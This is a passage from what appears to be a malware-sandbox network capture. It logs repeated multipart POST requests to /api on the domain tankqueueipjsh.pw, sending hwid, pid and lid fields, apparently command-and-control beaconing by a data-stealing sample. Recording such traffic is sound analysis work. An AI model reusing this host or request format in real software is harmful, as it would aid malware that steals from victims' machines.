                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:05.667087078 CET1340INData Raw: 45 72 73 4c 61 5a 42 79 70 6a 66 79 76 53 7a 7a 2b 58 33 36 57 58 39 79 52 6f 44 57 45 39 44 2f 6e 57 33 6b 70 4c 37 30 69 49 30 59 75 55 51 33 32 47 32 67 4e 66 79 33 4a 66 54 38 66 4c 59 53 4f 6e 70 64 79 59 74 61 37 75 36 55 59 2f 66 73 72 72
                                                                                                                                                                                                                                                                        Data Ascii: ErsLaZBypjfyvSzz+X36WX9yRoDWE9D/nW3kpL70iI0YuUQ32G2gNfy3JfT8fLYSOnpdyYta7u6UY/fsrr+azRK/CG+bP+R8+6xqq7hFtxspclGAkR35vJphv7zhvZXNGrsBYpxyoS7utC/y8HCoGzV+Xs6NWOD9kWzx4aj6340YrUQ32FCpLOq/Kf+4aPQOf3JSgNYT7PCYbPjlqLqS3xi1AGSXc6Qw978h8PJ+uRs5dFDAgFO
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:05.667123079 CET1340INData Raw: 35 79 71 7a 50 39 74 43 58 33 38 33 36 38 46 6a 4a 77 55 38 53 63 57 65 76 7a 6b 57 54 7a 36 65 48 30 30 63 6f 48 39 56 77 76 71 58 4b 6b 4d 76 75 69 61 75 79 32 62 76 6f 51 4d 7a 55 47 67 49 39 66 37 2f 2b 53 62 76 7a 6c 71 36 69 44 77 52 61 39
                                                                                                                                                                                                                                                                        Data Ascii: 5yqzP9tCX38368FjJwU8ScWevzkWTz6eH00coH9VwvqXKkMvuiauy2bvoQMzUGgI9f7/+Sbvzlq6iDwRa9AWOTcawu+rsj8Pt+vR8zf13Hzh2g+4Utp6SCrYHAX6pKdth4pnyk9CL+8H2+EDJyWMmcWuXynWn066e+ks0NswBnm3KnMv+war24cKJXZzVszYBI7/uMZ7/776PRyhP1XC+ccbg3/b8h/f94vx0/elrDgFjh/5Vg8
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:05.667160034 CET1340INData Raw: 2b 6a 4f 7a 2f 33 76 36 54 33 39 35 55 4d 57 4f 57 65 62 34 6d 47 76 31 34 61 47 78 6b 73 49 62 73 77 42 67 6d 48 53 6a 50 66 71 78 49 50 6a 2b 65 72 6b 52 4f 54 55 51 67 49 6c 4c 6f 4b 54 64 54 65 54 70 72 62 33 52 30 6c 47 73 52 47 69 55 50 2f
                                                                                                                                                                                                                                                                        Data Ascii: +jOz/3v6T395UMWOWeb4mGv14aGxksIbswBgmHSjPfqxIPj+erkROTUQgIlLoKTdTeTprb3R0lGsRGiUP/J897gu9Ph6uR86cVTFjlvy9J1q7fahs5TBHLUAaZF5qTi8+mr04DfiVxJ5WemJSKDj03S/4636yY0evg5glXysP/exIPL/f7cFPHpRxI5c5vqcYvnjqLuZyl/7RGiAP/J80rMp97ho9A5/clKA1hPl/5pr8Oynvp7
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:05.667201996 CET1340INData Raw: 6d 36 45 6a 68 34 55 4d 61 4a 55 4f 6a 34 6e 47 50 7a 37 71 4b 2b 6b 6f 31 52 39 51 4e 33 32 43 66 71 44 66 2b 77 4c 63 48 37 65 66 67 77 4a 57 4e 5a 7a 4a 39 59 37 66 44 66 57 50 7a 71 72 37 32 48 6a 51 44 37 48 53 2b 66 63 2b 70 6b 76 4c 38 73
                                                                                                                                                                                                                                                                        Data Ascii: m6Ejh4UMaJUOj4nGPz7qK+ko1R9QN32CfqDf+wLcH7efgwJWNZzJ9Y7fDfWPzqr72HjQD7HS+fc+pkvL8s//R3vAUxekzKnFfu+JFj9umuv4PJH6cFap9xpy759GSz/2/6T39PSseeQue+qG7x6qas0dJRrERolD/yfO6mKvj4cLQFPn1Ryo5V6/aeZPvqqLyQwB60BGqYdrgxvPpq9OA34lcIeVXxjUWiyZ5j8eO3+o6DBvUDY
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:05.671864986 CET335OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:05.932383060 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:05 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=5h5rb7u1qdoctiejl04d7etg6m; expires=Sun, 31 Mar 2024 07:21:44 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:05 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:05 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:05 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SL2Ljo7ciWgQktI2c%2BL9%2FYV79JrC06l0h9PJWjaBPG%2Fj%2BlWC7f8VBunRbkPh9aK5OqhLXxe9%2FQV1Gj7p2VilVuj%2Fb8Pw7NcSqarb9pGIXEy5zrWmXaFvF0o6esGpm4MJc8HtRA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        11192.168.2.550197104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:06.031069994 CET335OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:06.031265020 CET554OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:06.382798910 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:06 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=6bb9stssfd2ofnrgjj4irr1e8c; expires=Sun, 31 Mar 2024 07:21:45 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:06 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:06 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:06 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kiC53MyAftrA0PXbtIrYHYG%2FwAvBiGmeqBDVmZXo5BkulUjl9xpCOQsCgT1GNcrL4XRXgoVt0FSLu0NHOKMlnOQ0bMMgPrdMVTJ41uwHG244l6t%2BbN3PP9zFyn1WQ0G%2FfgwwoA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: clou
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:06.382837057 CET120INData Raw: 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 38 66 65 65 64 39 38 30 38 32 65 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: flareCF-RAY: 8314e8feed98082e-IAD15Malformed packet data
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:06.382870913 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        12192.168.2.550198104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:06.485714912 CET335OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:06.485888004 CET554OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:06.849319935 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:06 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=odbbia2upndmt2oqtrfvg76b5a; expires=Sun, 31 Mar 2024 07:21:45 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:06 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:06 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:06 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rhMkquuJkkbFskMQ48P9mWxi2gCpXX%2F1fhuHkhHBsr8bjaDKsBMkoIEGiOzZo61fBOD36FCjzjEXoPwpLRG17Ia7kVGtgr3ZGZ9evPBNDqBwYMSr3SJsT5TYIilRGaOQruvEtA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudfla
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:06.849338055 CET116INData Raw: 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 30 31 63 38 62 63 30 37 66 61 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: eCF-RAY: 8314e901c8bc07fa-IAD15Malformed packet data
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:06.849364996 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        13192.168.2.550199104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:06.951947927 CET335OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:06.952405930 CET554OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:07.373111963 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:07 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=chd5stbv4sakvku6ea3rce8tvt; expires=Sun, 31 Mar 2024 07:21:46 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:07 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:07 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:07 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ikm522ImSIFixcpH4LNrLQzGdHgubB%2BNL0eSm%2B7pSP4LK0RiQ3zo%2BoCBDSM0FplWgJxArcZLg6Cw%2BLamdrxBKj1HLl6cOeT0F%2BQCjppfm%2FMXXPGX3vMzElhe8k0RGj0k7QZFcw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:07.373174906 CET126INData Raw: 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 30 34 62 65 61 34 30 35 38 33 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: cloudflareCF-RAY: 8314e904bea40583-IAD15Malformed packet data
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:07.373214006 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        14192.168.2.550200104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:07.471513033 CET335OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:07.471716881 CET554OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:07.825579882 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:07 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=aqndrdqae8f2avupoveovgj2jf; expires=Sun, 31 Mar 2024 07:21:46 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:07 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:07 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:07 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XF9qDfFwxeouBMdxdsnGAFg7UPYswVrruds7kyJym9R%2FsVt5xa6Ma4EB8cwCCimQKVn4lu0pKMs00qF%2FObI7myUe3DefXaXpfA3fiNZMrOeGu%2B8Tt8JSI%2FeHIEofxOMyivdqug%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cl
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:07.825597048 CET122INData Raw: 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 30 37 65 39 30 65 31 66 65 32 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: udflareCF-RAY: 8314e907e90e1fe2-IAD15Malformed packet data
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:07.825620890 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        15192.168.2.550201104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:08.714196920 CET335OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:08.714343071 CET554OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:09.068412066 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:09 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=h4ie8f424h9ger15pvj4vr4jf5; expires=Sun, 31 Mar 2024 07:21:47 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:08 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:08 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:08 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pwLQoD32yNea7ngS%2FfYbhBCdfZoVWhhonPZvyOUDKXPHAukMmhIUMQADXzfOcd9yAK16IxKBBgauSGndXZz7zLcDsfZDv3t%2BdXwXUXL65I9pHAFHh78u3jujiUBfsvKCuIEjVg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudf
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:09.068437099 CET118INData Raw: 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 30 66 62 65 62 65 31 66 64 36 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a
